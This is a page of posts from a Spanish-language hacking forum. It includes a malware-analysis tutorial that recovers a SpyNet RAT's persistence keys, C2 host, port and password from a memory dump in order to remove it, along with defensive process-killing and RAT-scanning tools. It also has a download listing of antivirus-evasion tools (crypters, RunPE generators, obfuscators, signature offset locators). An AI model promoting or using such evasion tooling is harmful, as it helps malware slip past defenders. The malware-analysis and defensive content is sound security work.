            --import        List Entry Import instances
            --export        List Entry Export instances
            --resource      List Entry Resource instances
            --debug         List Entry DebugData instances

    Web:

    You are not allowed to view links. Register or Login

    36
    C# - VB.NET / [VB.NET] Coleccion de Temas + Tutorial
    « en: Marzo 05, 2014, 08:50:30 am »
      Aquí les dejo  esta coleccion de Temas para sus proyectos en vb.net
       
    • 1.vb
    • Adobe_Theme.vb
    • Advantium_Theme.vb
    • av.vb
    • Avast_Modern_Theme.vb
    • Beyond_Theme.vb
    • BitDefender_Theme.vb
    • Black_Shades_Theme.vb
    • Blue_Theme.vb
    • Booster_Theme.vb
    • Bullion_Theme.vb
    • CarbonFiber_Theme.vb
    • Classic_Theme.vb
    • Classic-Dark_Theme.vb
    • clsNeoBuxTheme.vb
    • Cypher_Theme.vb
    • Dark-Matter.vb
    • Dev-Point_Theme.vb
    • Drone_Theme.vb
    • DynamUIT_Theme.vb
    • Effectual_Theme.vb
    • Effectual+GDI+_Theme.vb
    • Electric_Theme.vb
    • Exion_Theme.vb
    • Facebook_Theme.vb
    • Flat-UI_Theme.vb
    • Flow_Theme.vb
    • Fusion_Theme.vb
    • GameBooster_Theme.vb
    • Ghost_Theme.vb
    • Green_Theme.vb
    • Influence_Theme.vb
    • Influx_Theme.vb
    • Leaked_Private_Sky_Dark_Theme.vb
    • Meph_Theme.vb
    • Multi-Design_Theme.vb
    • NamelessTheme.vb
    • NYX_Theme.vb
    • Orains_Theme.vb
    • Origin_Theme.vb
    • PalaDIn_Theme.vb
    • Perplex_[Finally Finished]_Theme.vb
    • Positron_Theme.vb
    • Prime_Theme.vb
    • Purity_Theme.vb
    • Purityx_Theme.vb
    • Reactor_Theme.vb
    • Recon_Free_Theme.vb
    • RecuperareII_Theme.vb
    • Redemtion_Theme.vb
    • RockStart_Theme.vb
    • Sharp_Theme.vb
    • Simpla_[Pure GDI+]_Theme.vb
    • Simple_Theme.vb
    • Simple-Draw_Theme.vb
    • SLC_Theme.vb
    • Steam_Theme.vb
    • Steam2_Theme.vb
    • Studio_Theme.vb
    • SubSpace_Theme.vb
    • Sugar_Release_Theme.vb
    • Tab_Theme.vb
    • Teen_Theme.vb
    • Tennis_Theme.vb
    • Thief3 VB.Net_Theme.vb
    • Thirteen_Theme.vb
    • Twitch_Theme.vb
    • Ubuntu_Theme.vb
    • V2Black_Theme.vb
    • VI_Custom_Theme.vb
    • VibeLander_Theme.vb
    • Visceral_Theme.vb
    • Vitality_Theme.vb
    • xVisual_[12Controls-Ligth & Dark Custom]_Theme.vb
    • Youtube_Theme.vb



    Como agregar temas en vb.net

    [LIST=1]
    • Clic en Proyecto -> Agregar Clase o tambien en Agregar elemento Existente y seleccionar el Tema de este Pack(Si sigues lo segundo, saltar al paso 3).




    • Si sigues lo primero, copiar todo el código del tema y reemplazarlo y Guardar todo.




    • Luego darle a Compilar Solución.


    • En la parte Izquierda, en el Cuadro de Herramientas Apareceran los controles del tema.



    [/list]


    Descarga: You are not allowed to view links. Register or Login
    Contraseña: pack_vb.net_byfudmario

    37
    Tutoriales y Manuales de Malwares / The Hunting-by fudmario
    « en: Febrero 04, 2014, 02:45:53 am »
    The Hunting - by fudmario [1/2]

    Análisis de Malware parte III



    Hola a todos, hoy vamos a ver algunas tecnicas más para el Análisis de Malware, asi de alguna u otra forma no depender tanto de los Antivirus y como siempre tratando de sea lo mas comprensible.

    Si no viste los dos anteriores aqui les dejo los links:

    You are not allowed to view links. Register or Login

    You are not allowed to view links. Register or Login

    Recordaran que en los dos talleres sobre "Análisis de Malware", obtuvimos toda la informacion del server(nJrat v0.6.4) y procedimos quitar al malware tan solo Redireccionado las conexiones a localhost y como no tenia Contraseña ese RAT fue bien sencillo quitarlo, bueno por ahi me preguntaron: Y si tiene contraseña el server? se puede? ...tambien se puede cuando tiene Contraseña, hoy veremos una forma.
     
    En general muchos siempre cuando descargan aplicaciones lo primero que hacen es ejecutarlo sin antes revisarlo,grave error, antes se debe tratar de obtener información acerca de lo que ejecutemos en nuestra PC, para así evitar perdida de información, a continuacion veremos que es lo que hariamos en este Caso.

    Malware Sample #1

     
    Accidentalmente ejecute una aplicación en una maquina virtual, Ahora bien debemos determinar si el archivo es malicioso, si realiza conexiones, registros,etc... lo de siempre, asi que vamos a probar con los RATs más comunes, utilizaremos el "Scan-Rat by fudmario", pueden obtenerlo You are not allowed to view links. Register or Login.

    "Como no tengo .NetFrameWork instalado en la virtual, lo ejecutaré en mi PC Real en una SandBox para sacar la información necesaria con el Scan Rat"


    Observamos que se trata del "Spynet v2.6", ahora que sabemos donde se ha instalado, Registro para su ejecucion despues del Reinicio, lo que nos queda será matar el proceso(Aqui dejo el link de You are not allowed to view links. Register or Login que hice) y borrar todo rastro de este RAT, pero les mostraré una forma mas interesante de hacerlo, ¿Comó? mediante un "Volcado de Memoria".

    Bueno Explico, si el archivo no estuviese encryptado esto sería un poco más Fácil, lo hariamos con un editor HexaDecimal mirando las Strings del archivo, ahora con el "Volcado de Memoria" intentaremos obtener informacion que no pueda ayudar.

    Utilizaremos "DumpIt" para el volcado de memoria, utilizado para Análsis Forense, es pequeño, portable y fácil de usar, si ustedes quieren pueden probar a usar otros.
    depende de la memoria puede tomar algo de tiempo al momento del Volcado.

    Una vez que haya finalizado, el archivo lo pasaremos al Editor Hexadecimal(), y buscaremos cadenas de texto que nos pueda dar informacion útil.
    Para no buscar y buscar en todo el archivo solo extraje poca información usando esos 2 filtros, pero en el archivo(.raw) encotraras más información.


    Filtrando un poco más  nos encontramos con esto.


    Reportes:

    [ 1 ] Reporte de Scan-Rat by fudmario:
    Código: You are not allowed to view links. Register or Login
    [Info]
        [+] SpyNet 
        [+] Version - v2.6
        [+]  Found Malicious Files
    ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
    [Dropped - File]
        [+]  C:\Program Files\updater\servercito.exe
        [+]  C:\Users\fudmario\AppData\Roaming\logs.dat
    [StartUp]
        [+]  HKCU\Software\microsoft\Windows\CurrentVersion\Policies\Explorer\Run => C:\Program Files\updater\servercito.exe
        [+]  HKLM\Software\microsoft\Windows\CurrentVersion\Policies\Explorer\Run => C:\Program Files\updater\servercito.exe
        [+]  HKCU\Software\microsoft\Windows\CurrentVersion\Run => C:\Program Files\updater\servercito.exe
    [Active Setup]
    [+]  StubPath -> C:\Program Files\updater\servercito.exe

       
    [ 2 ] Reporte del Volcado de Memoria:

    Filtrando todo el archivo(.raw), obtuvimos lo siguiente:

    Código: You are not allowed to view links. Register or Login
    - FileName: servercito.exe
    - Pass: abcd1234
    - Host: adobe-updaterx300.no-ip.biz
    - Port: 667



    Ya sabiendo de que Rat se trata y conociendo el Host, puerto, y la contraseña lo que haremos será redireccionar todas las conexiones a localhost mediante ApateDNS y des-instalarlo con el propio Spynet(Otra vez como no tengo .NetFrameWork no podré ejecutar el ApateDNS así que solo les mostraré como sería desde  Win7).






    ------------------------------------------------------------------------------------------
    Eso es todo amigos,trate de ser lo más claro en la explicación y espero que sirva de ayuda, cualquier duda, sugerencia, critica, aqui estamos para ayudar.
    ------------------------------------------------------------------------------------------


    Autor: Fudmario.


    PD: "Si alguien decide llevar este tutorial a otros lados,se pide respetar el Autor y la Fuente de la misma".

    38
    Seguridad / Kill Process v1.0 | by fudmario
    « en: Enero 28, 2014, 02:03:06 am »
    Kill Process v1.0 | by fudmario










    • Caracteristicas:
    • Kill Process - Normal
    • Kill Process - protegindo por BSOD
    • Kill Process - Procesos Persistentes(**)
    * Boton OFF|ON, Si esta Activado(ON) detecta cualquier proceso que se ejecute y pregunta si desea eliminar.
    ** Si no se ejecuta el explorer click en start

    Descarga: You are not allowed to view links. Register or Login
    Contraseña: byfudmario

    39
    Seguridad / Scan Rat v1.0|by fudmario
    « en: Enero 18, 2014, 12:52:09 pm »
       
     
       
       
     
     
     

    • Añadido:

       - Scan personalizado donde muestra los ficheros Creados/StartUP
       - KillProcess para procesos que protegidos por el BSOD(esto para el njRat/Test|Win7).
       - RAT -> nJRat v06.4.|
     

     
     
     Descarga: You are not allowed to view links. Register or Login
     Contraseña: byfudmario

     

    40

    [Mega Pack] Modding Tools by fudmario
    Hola Amigos aquí les traigo esto que recolecte hace tiempo, eh añadido algunas herramientas más del anterior pack.











    Lista de Herramientas:


    • HexWorkshop 6.0.1.
    • CFF Explorer.
    • PE Explorer.
    • Resource Tuner.
    • Resource Hacker + [Mod | FXer].
    • StudPe 2.6 .
    • Lord PE by Yoda..
    • ProcDump.
    • OllyDbg.
    • PEiD.
    • PE Labz by Abronsius.
    • Offset Patcher by Metal.

    • RunPE Generator By Pink
    • RunPE Generator By M3
    • RunPE Generator By V0id
    • Generador de RC4 Ascii by Matabarras
    • Unique Encrypter Generator by M3
    • Gerador ofusccao Xor by Thocks
    • Obfuscate Api by M3
    • [ACO] v0.3
    • [ACO] v0.4
    • JunkCode Generator.

    • Cambiador de Delimitadores by Expermicid
    • Source Undetector v0.1
    • M3 Code Ofsucator v1
    • Comparador de Offset by Expermicid
    • PeCompact + K
    • Petite 2.3
    • Private exe Protector 3.1.4
    • MoleBox 4309
    • String Generator by fudmario
    • Stub Generator[Beta] by fudmario


    | ANOTADORES |



    • Anotador by LuisN2
    • Anotador by Leem
    • R-007 Offset Anotador
    • Anotador by Kr34t0r.
    • AnotadoR by M3
    • Anotador M-H
    • Anotador by Metal
    • BoLiTa -FUD(0-37)
    • Bolita v1.0
    • JackBolita

    | BBCode GENERATOR | CHK4ME |



    • Chk4me bb-code gen by Metal v2
    • Chk4me BBCode Generator by Crypt
    • chk4me scan by Velario
    • M3 Online BBCode

    | GUI | COMMAND LINE SCANNER |


    • A-Squared CLS
    • Avast CLS
    • BitDefender CLS
    • DrWeb CLS
    • Kasperky Borrado de Archivos
    • F-Prot CLS
    • Ikarus CLS
    • Sophos Scanner
    • Nod32 CLS
    • Norman CLS
    • Panda CLS
    • VBA CLS Borrador Automatico.
    • Avira CLS by Metal [Fixed]
    • Essentials CLS by metal V2
    • Panda CLS by Metal [Fixed]
    • Vipre CLS by Metal
    • ClamWin Portable.
    • MultiScanner V3 by Expermicid
    • OverSec Multiscanner V3



    | OFFSET LOCATOR | EDITION COLLECTIONS |


    • AAV-TOOLS 2008
    • AAV-TOOLS 2009
    • Apofis-Locator [By AX]
    • AV Fucker Traduced By MicroAttackeR
    • Chamaeon Offset Locator 1.0
    • Chamaeon Offset Locator 2.0
    • M-H Offset Locator By Expermicid
    • ForoMalware Offset Locator
    • [C]orp-51 Offset Locator 1.0
    • [C]orp-51 Offset Locator 1.6
    • [C]orp-51 Offset Locator 1.8
    • [C]orp-51 Offset Tester By ØnLy
    • UDT Offset Locator 1.0
    • UDT Offset Locator 2.0
    • Indetectables Offset Locator 1.0
    • Indetectables Offset Locator 2.0
    • Indetectables Offset Locator 2.2
    • Indetectables Offset Locator 2.5
    • Indetectables Offset Locator 2.6
    • Monster Modder Tools By DaPimP
    • DSplit By Slek
    • FUDOnly Offset Locator V3
    • Optimize DSplit by ØnLy
    • Optimized Offsets Locator By ØnLy
    • Signature Zero [ES]
    • Signature Zero [EN]
    • OverSec Offset Locator
    • Dekoders Offset Locator
    • IND Locator v1.1 By Swash
    • Offset Remover
    • Indetectables Special Offset Locators
    • Locator Special v0.4 By Metal
    • Udt Offset Checker v1.3 By Metal
    • Underc[0]de Offset Locator v Beta
    • Underc[0]de Offset Locator v1.0 By Expermicid
    • X - Offset Locator By Satyr90




    Descarga: You are not allowed to view links. Register or Login
    Alternativa: You are not allowed to view links. Register or Login

    Contraseña Mega-Pack 2013-214

    Páginas: 1 [2] 3